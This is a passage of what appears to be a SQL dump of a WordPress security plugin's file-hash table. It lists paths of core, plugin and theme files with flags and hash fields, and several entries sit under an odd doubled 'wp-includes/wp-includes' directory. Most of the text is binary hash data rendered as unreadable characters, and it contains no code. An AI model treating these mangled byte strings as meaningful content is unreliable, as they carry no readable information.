��,��~�r�','L>���e������h�\rF$�C�V������7�','',0,'?'),('��]��p�R�/$�1�','wp-content/plugins/wordfence/views/common/page-fixed-tabbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+�$B`w�ƕ���','�a����6���Ο���v]z5�����\r�p�c�','',0,'?'),('���P��W2�.����','wp-includes/wp-includes/sodium_compat/LICENSE',0,'�x�6F�\0f����','�x�6F�\0f����','N��^q��yqܯ\r]�S��\\��[�C{V��y�w�','',0,'?'),('������浉���C��','wp-content/plugins/all-in-one-wp-security-and-firewall/images/shield-security-icon-36.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r/6���Kd���|D','�)7; @v�L��>�]M|�c����)d����k','',0,'?'),('��u�7���A��o��2','wp-content/plugins/wordpress-seo/src/config/indexing-reasons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W fŗ���\\�2','��h��G�\0^�x�*�z$�B8�7�����','',0,'?'),('��8��C���!0��','wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-fields-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<��f��(�\\{���','�?�F�y\Z����޲��(���zH����A�','',0,'?'),('��\"j���V���d�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/UriNormalizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	z]��B޷ĉ��','\n\n�d�Wu�\'.b��@8)�.7gr��.I�=>�&','',0,'?'),('��_w�ƌ����','wp-includes/widgets/class-wp-widget-media-video.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u1�z�vw�P�Z\Z��','��0|�}�D��=�j��攡ͪ���6�?�+�','',0,'?'),('��B�H���w����','wp-content/plugins/wordpress-seo/inc/class-wpseo-meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.�m��o��^�=�','��9X=QYw�K�\\R�l���6O2��ȽE','',0,'?'),('��y0(\n&��K�I��p','wp-content/plugins/wp-cerber/assets/flags/va.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�o`s,�ޛ��x��','C�2����}�p��I ��z��n�ꪖ?+��2�H','',0,'?'),('���P)/�+ �x�\r�H�','wp-content/plugins/wp-fastest-cache/inc/single-preload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~��VV7�:A(F','ªȋCu�zKwg�JBA��g}/��w]Dݮ&��x;','',0,'?'),('���q@�U���Q&�','wp-includes/wp-includes/images/smilies/mrgreen.png',0,'-5��^����J�j���','-5��^����J�j���','���M��g�$��+;��\0�5����H&\\E6%w','',0,'?'),('��Ҳ�0�t\nҕ��7','wp-content/plugins/wp-smushit/wp-smush.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2\05SU��yߕ|�ê',';%�̿������~�WE��C����y���%','',0,'?'),('�/�}%)��UZ�t','wp-content/plugins/wp-fastest-cache/inc/js-utilities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!���saB���!��','���8ۧy����n��D�+��15Z\Z$��a>�','',0,'?'),('�W��<+*KmE}�p5�','wp-content/plugins/wp-smushit/app/assets/images/graphic-smush-lazyload-default@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R��Rnp�V[B�','�~�h�t�y���\\]}�m(�|6�X;E�x+���','',0,'?'),('�-|V���H�%��','wp-admin/site-health.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�>+��/v���vf�','H�!��\'\"/�\n�Uoe��s���S�1Y�`�','',0,'?'),('��韌�����3i�Z�','wp-content/plugins/wp-smushit/app/assets/js/smush-react-configs.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�?T\Z.���{���J','���\'X\"��Rӧ��ޯ7�^q(�^8 ՗H}','',0,'?'),('��Ǣ�Bմ(�\\�0J','wp-includes/class-wp-text-diff-renderer-inline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s-;����a��','͹Yqq%W�b\Z�s蔋�зm����I\0��','',0,'?'),('�0:���6QUGA��k','wp-includes/wp-includes/class-wp-term-query.php',0,'Y\"������4XYt[','Y\"������4XYt[','��m⟮/�a�Ͳ(yMG.��dЪZ+����','',0,'?'),('�6N]bN��R������','wp-content/plugins/wordfence/vendor/geoip2/geoip2/.gitmodules',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ڄ �q�?s1����U','�REkks&]!i�_����\"���y~����Ka�','',0,'?'),('�;�%N!9�\nL&N���','wp-content/plugins/wordfence/views/onboarding/modal-final-attempt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C���β������J','�!�fc,B�R\"9,�V<��	F#�절K','',0,'?'),('�>��I7m���>�꣍','wp-includes/blocks/embed/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����S\\�޼��A�','%h���(����{鈚RX�c�?; �S��\n�','',0,'?'),('�@���sB0<�{l�3��','wp-includes/wlwmanifest.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ԑ����i�^��','�ƤJľ**X|i���cy-�u6p�C-�$*\n�','',0,'?'),('�B��F=��Ğ�zj,','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-node-contains.js',0,'���w��%[U��3�','���w��%[U��3�','Et������z��fD:x?���o��c�ڋ	8P','',0,'?'),('�D=������S��C','wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�X�������`йKZ','S�W��,��f���K{��\\�������^Y/�','',0,'?'),('�N�p!ֽ��Dfw','wp-includes/wp-includes/images/smilies/icon_surprised.gif',0,'U��-��#+����0�?','U��-��#+����0�?','��cuy�X�ؓ�A��d�5[=w>�*S�pwe�._','',0,'?'),('�X7� ���j��]k^`','wp-includes/wp-includes/js/tinymce/plugins/wpdialogs/plugin.min.js',0,'QO1�/<�>%\"�X��','QO1�/<�>%\"�X��','�6�r�*�IY\0�C�9<��Jږ J*�xD','',0,'?'),('�a*�˫Cq,p5g�','wp-content/plugins/wordpress-seo/admin/notifiers/dismissible-notification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�˨�P��`]oK\'[','>hLU�ƌ����	/EfOL���Z�7DC�\"�','',0,'?'),('�k����e<F��4','wp-admin/js/revisions.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bc\"��_��o���','+�};�j�#[�8��9\0�i�X�8F��PJm','',0,'?'),('�u�\\����)��S�_','wp-content/plugins/redirection/actions/error.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�_��i����_�','��d\0A޲�3���F�~i���JWJuk��lI','',0,'?'),('�}el����{Hd8g�','wp-includes/wp-includes/js/dist/edit-post.js',0,'Ե3<�Y5Ω8�z��;','Ե3<�Y5Ω8�z��;','�I&A ��k9H��xjW�;��JL�fS]z','',0,'?'),('����c�np�u�#�Y&','wp-content/plugins/wordpress-seo/admin/class-primary-term-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���myw��*lt�|�','��i�[wOz�a�X�MM�,��b��o���i���','',0,'?'),('��������G%?�c�','wp-content/plugins/wp-cerber/assets/flags/gb-eng.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�-@�*�#�J=\"F�',';����	~��\'�:32L�\ZG(�!�A���.��','',0,'?'),('���D��=K�49���','wp-includes/js/codemirror/codemirror.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�23j���1��(D��','��Ό�,a�u��@�s�Y%K���-o��n\r�','',0,'?'),('����Ȉִ����*��`','wp-content/themes/hitmag/inc/kirki/modules/custom-sections/panels/class-kirki-panels-nested-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tB��<gtA|`�f��','ev&��U��i4����pz�q#�+�Nt��','',0,'?'),('��9��̈́�_Ny��㝼','wp-content/plugins/wp-cerber/assets/flags/dm.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����l1�3��','O�t����Ya�U!�����gd�����P?Zܴ','',0,'?'),('�������CMp<E��','wp-includes/class-wp-oembed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����_�M�n����','	�+j@�`(Wqȕ����q;l�p�>|XU�','',0,'?'),('��S��pNDW��~`','wp-content/plugins/wp-smushit/_src/scss/modules/_media.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'6t_�Ѭ��S	���','��b��Rj�?Q}l�lu�z8w�E?:\r{w@b','',0,'?'),('��6+��%�ɺ �','wp-content/plugins/wordpress-seo/src/integrations/third-party/wpml-wpseo-notification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���	r��ZI=bq�!','�w��\0����{���s)6���2ѕi�C�','',0,'?'),('��M\\B�h����f[','wp-includes/wp-includes/general-template.php',0,'�lGfBp�X0=�aESy','�lGfBp�X0=�aESy','�qǼ<�x��Ӡ�A��X/rUCG�lW�\n*e','',0,'?'),('����쉹A�Ȝ�3\"g�','wp-includes/wp-includes/js/tinymce/plugins/wptextpattern/plugin.js',0,'E	��-N�o����','E	��-N�o����','�L�I‘�™Y�ow�)�4!:�;?��','',0,'?'),('��6K1���(��}/AX','wp-admin/network/user-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�`�.^*�����Љ�M','�Rδ�����`����t0)����>��+','',0,'?'),('��d@��=\'*\Z�@�-','wp-content/plugins/wordpress-seo/src/actions/indexing/indexable-general-indexation-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BS����\Z4ǬABK�f','�pV��q��F���qN�}�zMM�,Se���8','',0,'?'),('��3����R�C���V','wp-includes/blocks/calendar/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z\n������Uz�PU��','���2aC�[[��n�k�2!\ZR3L�.6l�R�','',0,'?'),('�ߐ��~��`A/mh�F','wp-includes/wp-includes/default-constants.php',0,'����f\n��G8��','����f\n��G8��','��/�R�5ڍC,�i�K�f�}���\\4/\0��','',0,'?'),('��ĩ�}x�(T��','wp-includes/js/dist/block-library.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y���𥳐��y{��','��!~QYn�M�djH \'�����\Z�*63�q\0��','',0,'?'),('���T`�p����<','wp-includes/wp-includes/load.php',0,'x8�7n�LH�g�gf�R','x8�7n�LH�g�gf�R','ŗْl5�������Xt�����C�\n�mA','',0,'?'),('���ӛ+:����0','wp-content/plugins/wp-cerber/assets/flags/ws.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�`d��#��a�%R1','��SK������N4�7�#XAQ�9���','',0,'?'),('�V��\nT>Z���-2L','wp-content/plugins/redirection/locale/redirection-en_AU.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J���l��\0]�O�!�}}','����J��y�4��s&��\ne���1��eB|Y','',0,'?'),('�^Q6l��J!�	�ͦ','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\��oN�.��','>4��i3�|��v1�N��6�wD�)M��jr','',0,'?'),('��ۼ��v|#��U)�','wp-content/plugins/wp-fastest-cache/languages/wp-fastest-cache-de_DE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e���5��q�>����R','s;Kޟ�\\���{�r������mL�plˣ�A��','',0,'?'),('� ń1�r}mJGW�R��','wp-content/plugins/wordfence/views/scanner/options-group-performance.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���P�=�PҤ��� ','�-9��\0t��D\\6�9s]��\\e\0R�r���','',0,'?'),('�95!��iM��~�&d','wp-content/plugins/wordpress-seo/src/builders/indexable-post-type-archive-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y��ew��f��a}','&�7,����#���L?0I4yxo\n+�HB|{�+','',0,'?'),('�A-=E�_��TSN�\'U','wp-content/themes/hitmag/css/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?��t�`ֱ�I�x�;�','?��VJ��¹����6�U���L�G����+�#','',0,'?'),('�D��3���$����','wp-content/plugins/wordpress-seo/js/dist/languages/ja.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@3�|8�0_���Ana�','�a=Y6�SDAB��t�L!j��Jm�!t}�;','',0,'?'),('�T��X��b4�=a@�#','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/select2.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jS�y�YQ2�Mer��','.QH(*�6�X 1�ӷ*g��δ6��C�O�#','',0,'?'),('�V	덵W�ky��	�','wp-includes/blocks/navigation-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ѿ�9�\\h�B����_','H����6g��\'�YUFw�ݨ=�~�QϿ��','',0,'?'),('��ɱ%��a{Z�j	%�','wp-includes/class-wp-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�<������x','�Z�|1�1oj/2GuB؊��W�܊��!BG�Q','',0,'?'),('����I�:4P�U���','wp-includes/SimplePie/Cache/Memcache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���u���5uyS��','�/��M�[�Qt�n.?χIqA?Tj<��woRI','',0,'?'),('����[܋�|���ب�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/sl.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ZC��;�i�)t��w','��*?N(���`9�In�O�X)�G���f	','',0,'?'),('���U�ϋ���S�88:O','wp-includes/wp-includes/js/jquery/jquery.color.min.js',0,'rq�*X�gq�O�(͈','rq�*X�gq�O�(͈','�x�2���<���k���Qݯ�����{��','',0,'?'),('��,���`�t��t�b7','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/i18n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�MP�<^f�G�� C','V�$oBޞj��f0�֫�Qx�u�T�=a��`�K','',0,'?'),('��8K�� ?O]ʹY','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/rules.key',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\ZlY^[F\r�2xʻ','�6=���S�q�-5 )��E�L}A�ViA]���','',0,'?'),('������:�v\0��֌s','wp-includes/blocks/post-comments-form/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�Z]����rh�\\�',')�����Iv�!W�ۢ�1���<m*Gm�A��','',0,'?'),('��苼����3���','wp-includes/blocks/shortcode/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�E�b;?(��X�#<','Jҁ;E�A�H��h2K��8���{�fZ�;E)/X�','',0,'?'),('����p�l4[���e��','wp-admin/js/inline-edit-tax.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u��,2�/b3S��','�F�c{�+�o�>\n��4���P���T,���S�','',0,'?'),('��|3A(\0��0�\'�I?','wp-content/plugins/wordpress-seo/src/commands/index-command.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�֮�.��>i*	[%\\\'','�\rq�/Ԫ��=��rV�Đ�6R�t���','',0,'?'),('���stqЇd$�\0|`\\m','wp-content/plugins/wordpress-seo/src/deprecated/admin/onpage/class-onpage-option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@~�a�B��gz��','��O�Ll�bw���;��\\=�~�\"HF}Yi1P!k','',0,'?'),('��l]���g	S�D�n','wp-includes/rest-api/endpoints/class-wp-rest-widgets-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�GR���b�z�2�r','p�ݟǠ��;#+���\"�4�U�z�1��Ĭ�','',0,'?'),('�����Ѝ3�>#�.�','wp-includes/rest-api/class-wp-rest-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X�?-����r5��ª','i0�	���Fyٴ��^.�d���]�x�?��','',0,'?'),('���A]�����TEIp','wp-content/themes/hitmag/images/slide.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G�d���>�G','�@;wfY\':��f��#��E���U�m���','',0,'?'),('�ަ?���%B��PR�','wp-content/plugins/wordpress-seo/src/generators/generator-interface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jX2��	�D�r�','LB�vH��[��V�dk�Լ}lE����}�','',0,'?'),('��K|H�#�[��x��','wp-includes/blocks/tag-cloud/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W��]rH��?�k	;U','V�xa��x ^�$�q�)�i##r|�fʼno�','',0,'?'),('�R��=��*�d��n�','wp-admin/includes/media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<�QU7��p�%`6\n','�8��<ט���&��-��e��ƀX~��}','',0,'?'),('�\r�׍���•K{!','wp-includes/css/dist/block-library/elements.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�sH���H㑡� �','/�hLLʭ�ShH�����J�Ժ4 � \"�?�A@','',0,'?'),('��ܙ��\n):�','wp-content/plugins/wp-cerber/assets/flags/rw.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��:��8�\'A�i�X�','��`�5	�cW]���g�s`u���)G\\�,��r�','',0,'?'),('��8��=����[ձ�','wp-content/plugins/wordfence/modules/login-security/views/page/manage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�����iYn$�q��G�','v_��eI�ܑ������z\"��[�1\no���F','',0,'?'),('��A����)͹D4�','wp-includes/pomo/plural-forms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���y�}8��y��*�z','���P�}�Ć�)-�6��K�;��%�s&\0��','',0,'?'),('�\"(���b?\Zg�s�q�','wp-includes/css/dist/reusable-blocks/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ށgky�Ƚ�imV���','�F4�B@R��j�ו��N�΄�SH��7�','',0,'?'),('�-^g��̺@\0/���','wp-content/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gD,V�=\\�bP','k�����~	��UH\Z��x�P��Ā��<��;X�','',0,'?'),('�.ն���Zg{�=��','wp-admin/css/customize-controls.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�-����8�X�rLI','YV}���:U_	�$�&B�.�Hk�ӯ.]�','',0,'?'),('�4/��ف�~��<+�','wp-includes/blocks/post-excerpt/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Aݓ,h[�Et�����','\Z��K��v]ި��6�� ��}�@���=5','',0,'?'),('�:Y����>���=','wp-includes/blocks/media-text/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0�#���?�]6�t','cJ��vJ3��!��KWj�j��N�C�\'','',0,'?'),('�k0�k⟆��V�X��','wp-includes/blocks/file/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ާ.��Lb���y���',']��w�ho��_;3x3$��Hc�)�f1��L','',0,'?'),('�n:�zW_�B�S�R��','wp-includes/js/jquery/ui/resizable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����I\0�D���{��','΀\0P���ak&铅\0���V� �+^�\Z���\r','',0,'?'),('�s�=(���\ngfP�h��','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-user-registration-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$�&!=���','�ci\r��x$�z;���]g��]���-�Z�v#','',0,'?'),('�w	���+�j���','wp-content/plugins/wordfence/views/common/status-circular.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����)�.=���g','q4^\"-�9����\nd1q����O,��','',0,'?'),('��$*�-�ً���','wp-includes/blocks/quote/theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3�Û�\r��>���y','�τ��]W�����������D�~V3��','',0,'?'),('��7ڔ!�2�x%�XN�3','wp-content/plugins/wordfence/views/options/option-token.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�EJR�`��5\Z�C\n','�_���N�R�Ϧg�N�r��{���oXӮ�','',0,'?'),('���~��a%��!�P','wp-includes/js/tinymce/skins/wordpress/images/pagebreak-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�6�#UQ:��|>#��','�(��[\n�̻�o�RAo�3��^����','',0,'?'),('��BV�\'/�l���Ov','wp-includes/wp-includes/js/jquery/ui/tooltip.js',0,'�&�<Q�1}�������','�&�<Q�1}�������','�M@�jM�m��\\����`T@�.���Rl.��','',0,'?'),('�����L?@��.~O�','wp-admin/css/colors/midnight/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����t%�IQ\\�‰`','Q I�&/k��\n���u�-���q�Ϡ�yz[|��','',0,'?'),('���\"7��bj�_x','wp-content/plugins/wp-cerber/assets/flags/bi.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{(%�c�E�mF��q�','��?�t�aM����5�9�/�z�k���J�\r','',0,'?'),('��3�(�q7M�hv��','wp-includes/wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php',0,'��pF��t1�+���','��pF��t1�+���','�;�}��\0[���\'\rq�����ĥd�;#�.','',0,'?'),('����T\n���e.(��','wp-includes/class-wp-image-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4\'��\n9=�Jؘ�e�)U','x3d������E\nV˜�Bf�t�2�;�','',0,'?'),('��ؘ�-�m4)}��	�','wp-includes/js/dist/reusable-blocks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C�/�c	�pA��5','^+I�9���\\[.�i�,���,w?�\ny���h�','',0,'?'),('����TM)��7�^\\9��','wp-includes/wp-includes/js/swfupload/handlers.js',0,'��*�#�0�-�Ճp�','��*�#�0�-�Ճp�','H�#����a:��1������߯orrj�uz�zV','',0,'?'),('�ܧ��@�{9�@�w<','wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-platinum-seo-pack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�hJAբU��kѪ�Ln','!��^��-Pm�Y8P�:�#_H���������','',0,'?'),('����}c�>���[G�@�','wp-includes/wp-includes/rest-api/class-wp-rest-response.php',0,'�f�0����Sy?�','�f�0����Sy?�','�fG]< *�:m/K<-�C�~�5�%���Sw','',0,'?'),('���Kv��KM;��','wp-includes/blocks/comment-content/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uo24+�8p�פF1R�j','s�xj\'W��va���H��:!������D','',0,'?'),('��GtYL�^O�@���{�','wp-content/plugins/redirection/modules/wordpress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&e�bӬ���R�C�0','�5P~(�r��0�p��Lb��9/���P','',0,'?'),('��Z�p%\'n\Z��Wj��','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_real.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ey���B�J','>?z�y��O�IncC!��Y�����;/:�<\nJ�','',0,'?'),('��}���PÛ�P\\�\Z','wp-includes/js/tinymce/plugins/wpautoresize/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G��:�U�IYV�d�k','H���\\��6�J�\r�\"�\"��Ih�lzwL�^�','',0,'?'),('��\0�\'5F)\"��ټ�','wp-content/plugins/wp-cerber/assets/flags/er.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*��Rek�����.�|','��ըi��#�X �d�����^��\\�\Z��','',0,'?'),('��R�,�A���\Z�GJ\'-','wp-includes/default-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"$�Fj�I\'V#�HQ��E','�71��A���6EV:\r&��\\C��4�V��v�','',0,'?'),('���B���z;�����','wp-content/plugins/wordpress-seo/src/presentations/indexable-error-page-presentation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!.��\'�f�]���','�ݼ�^��Q��i��#Et.+��ׁ�U��','',0,'?'),('��g�(�35��5�k�(','wp-includes/blocks/heading/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DN��/Y��i`R','K���8���c�X�����D�0�d���|��J6','',0,'?'),('���\n\\�ɶ.5���','wp-includes/images/xit.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	3X�ī9+�6n~','�� s������ۨ��S,md�\\Yb�Ƈ��o','',0,'?'),('���Ь�p�I��YR','wp-includes/sodium_compat/src/Core32/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�K��y�\"��J���','~T��)_����ԇ���YH+���ɏ\'�	;','',0,'?'),('�u�sU~�Y-y&R�','wp-content/plugins/wordpress-seo/src/models/indexable-hierarchy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Dd�W����H�zK�','��e�\'2?��.Ct�\'o%C 0�X�@�?�y��','',0,'?'),('���u7?�sږcZ\'^�','wp-content/plugins/wordpress-seo/vendor_prefixed/chillerlan/php-qrcode/src/Traits/ClassLoader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��xEi ��wWp�\n','�JQ9�s:�R��j�ض.f�������ɲl','',0,'?'),('� c�O����4ĨǖM','wp-includes/blocks/post-terms/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J��΍=�v�sN~','8ġ�R�p�`e����FMC3�|��E�w�j��','',0,'?'),('�(Њ�QB&����Q?�','wp-includes/blocks/categories.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}�q��&�sP�!H\n','›TtN{�z���P�ٗ�T�wD�〝۩��\"�','',0,'?'),('�/�Х� qm&VMc~�','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php',0,'	~��ZJ�yΧ�%���','	~��ZJ�yΧ�%���','�hH��M����7�m��\'iB�@�>�','',0,'?'),('�D����]�|߼�$�','wp-includes/js/mediaelement/wp-mediaelement.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(D�q�|�����','P�E+#��M�s;agL���e��S�MN��r=','',0,'?'),('�Ph�����rV�','wp-admin/css/revisions-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�$o �|��{���Z\'','jU����z�M����ɸg;ܲeg<1u`�p','',0,'?'),('�[A��$/]t{���','wp-content/plugins/wordpress-seo/src/exceptions/importing/aioseo-validation-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vK(���ob)�–','��з�iI�tZ�{��*�bd)!ID�#�=�','',0,'?'),('�k=���\\b���ܡ�','wp-content/plugins/wordpress-seo/src/integrations/exclude-oembed-cache-post-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C�F?x������e�','o)X�b�=ϵ	׮KK�ӈ���\0Asc@�M2k��','',0,'?'),('�zt�[���������','wp-includes/blocks/heading/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9Fs)�#�1��� 	','�|\Z��6���Q_R�|��)Eo�vS�w,%�~�','',0,'?'),('��`�!��ŏ��3`�','wp-content/plugins/all-in-one-wp-security-and-firewall/images/plugin-icon2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Qd�B\\�*ض���','n�Z�/ļ���.3Е���+�w�\'*��`��','',0,'?'),('��]N��l,p�!`�U>\n','wp-content/plugins/wordpress-seo/src/deprecated/src/conditionals/japanese-support-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+��$���L��E�R','�k-/�!H3nO���z#r\'��1�k�#��','',0,'?'),('�������9]��\'�9�','wp-includes/wp-includes/css/wp-embed-template-ie.min.css',0,'7{WP�L�{H���I�','7{WP�L�{H���I�','\\aWq1��+��Я�o�L�Y\0�„K���%<','',0,'?'),('���\'��VB�~�w','wp-includes/blocks/query-pagination/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ډ�y�	��$E�','�Ρ��D@+=�tf���]K�j�\\Y��v0P','',0,'?'),('���э�%w��~���~','wp-content/plugins/redirection/matches/referrer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B��a��l���H�3','����\r�.��_�I4�ZDf�5�A�ڝ�/(','',0,'?'),('��2]&֔#���^F�q�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/PermissionRequiredException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2΢�	�/�E!�<s�','\\�=���5��3	�ώv��_%�2��A�?$','',0,'?'),('����Ր-F}e�8�	','wp-content/plugins/wordpress-seo/src/generated/assets/externals.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'G�-�k��tg���','6��?�ZwҚH�<պ��H���B�S��	